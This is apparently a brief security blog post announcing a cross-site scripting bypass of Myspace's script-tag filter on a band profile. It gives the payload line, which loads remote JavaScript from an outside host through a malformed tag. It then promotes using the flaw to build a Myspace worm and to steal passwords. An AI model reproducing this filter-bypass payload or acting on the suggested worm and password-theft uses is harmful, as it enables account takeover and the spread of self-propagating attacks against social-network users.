A new xss vulnerability has been discovered by Daniel Lo Nigro which is implemented on a Myspace band profile. He has found a trick to bypass Myspace filters which prevent <script> tag. It can be exploited this way :
URL: test.com?<scrihttp://pt src=//site.com/xss.js>
And of course this xss can used for implementing myspace worm , or even for some advanced myspace hacking or Myspace password hack.
Mirror : http://xssed.com/mirror/57181/
Random articles :
- l0ckergn0me: Windows Vulnerability Scanner v1.29 (via Blog) (lockergnome.com)
- Addicted to Facebook? Your Phone Is Calling (wired.com)
- The Seven Security Pain Points (sciencetext.com)